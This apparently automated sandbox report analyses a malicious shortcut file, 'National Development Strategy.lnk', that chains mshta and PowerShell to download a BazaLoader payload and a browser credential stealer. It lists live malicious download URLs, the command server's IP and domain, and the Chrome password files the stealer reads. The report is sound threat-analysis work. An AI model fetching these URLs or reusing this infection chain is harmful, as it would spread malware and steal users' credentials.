Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\Desktop\Loginvault.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42B5200 cpuid 18_2_00007FF6A42B5200
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42BBB48 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 18_2_00007FF6A42BBB48

Stealing of Sensitive Information
barindex
Yara detected BazaLoader
Source: Yara match File source: 18.2.lsacs.exe.7ff6a42b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.lsacs.exe.7ff6a42b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\ProgramData\lsacs.exe, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected BazaLoader
Source: Yara match File source: 18.2.lsacs.exe.7ff6a42b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.lsacs.exe.7ff6a42b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\ProgramData\lsacs.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 794563 Sample: National Development Strategy.lnk Startdate: 30/01/2023 Architecture: WINDOWS Score: 100 64 Multi AV Scanner detection for domain / URL 2->64 66 Antivirus detection for URL or domain 2->66 68 Windows shortcut file (LNK) starts blacklisted processes 2->68 70 3 other signatures 2->70 8 mshta.exe 25 2->8         started        process3 dnsIp4 48 cloud.archive-downloader.com 193.149.129.50, 443, 49698, 49702 DANISCODK Denmark 8->48 50 cdn1.iconfinder.com 172.64.193.26, 443, 49701 CLOUDFLARENETUS United States 8->50 52 192.168.2.1 unknown unknown 8->52 74 Windows shortcut file (LNK) starts blacklisted processes 8->74 76 Suspicious powershell command line found 8->76 12 powershell.exe 17 8->12         started        16 powershell.exe 17 17 8->16         started        19 powershell.exe 11 8->19         started        signatures5 process6 dnsIp7 54 cloud.archive-downloader.com 12->54 46 C:\ProgramData\lsacs.exe, PE32+ 12->46 dropped 21 lsacs.exe 65 12->21         started        25 conhost.exe 12->25         started        56 cloud.archive-downloader.com 16->56 58 Powershell drops PE file 16->58 27 AcroRd32.exe 15 37 16->27         started        29 conhost.exe 16->29         started        31 conhost.exe 19->31         started        file8 signatures9 process10 file11 38 C:\Users\user\AppData\...\win32crypt.pyd, PE32+ 21->38 dropped 40 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 21->40 dropped 42 C:\Users\user\AppData\Local\...\steal.exe, PE32+ 21->42 dropped 44 40 other files (36 malicious) 21->44 dropped 72 Multi AV Scanner detection for dropped file 21->72 33 steal.exe 1 21->33         started        36 RdrCEF.exe 63 27->36         started        signatures12 process13 signatures14 60 Multi AV Scanner detection for dropped file 33->60 62 Tries to harvest and steal browser information (history, passwords, etc) 33->62
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
193.149.129.50
 cloud.archive-downloader.com Denmark
15411 DANISCODK true
172.64.193.26
 cdn1.iconfinder.com United States
13335 CLOUDFLARENETUS false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
cloud.archive-downloader.com 193.149.129.50 true
cdn1.iconfinder.com 172.64.193.26 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://cloud.archive-downloader.com/lsacs.exe true
  • Avira URL Cloud: malware
 unknown
https://cdn1.iconfinder.com/data/icons/google_jfk_icons_by_carlosjj/512/chrome.png false
    		high
    https://cloud.archive-downloader.com/s.hta true
    • Avira URL Cloud: malware
    		 unknown
    https://cloud.archive-downloader.com/file.pdf true
    • Avira URL Cloud: malware
    		 unknown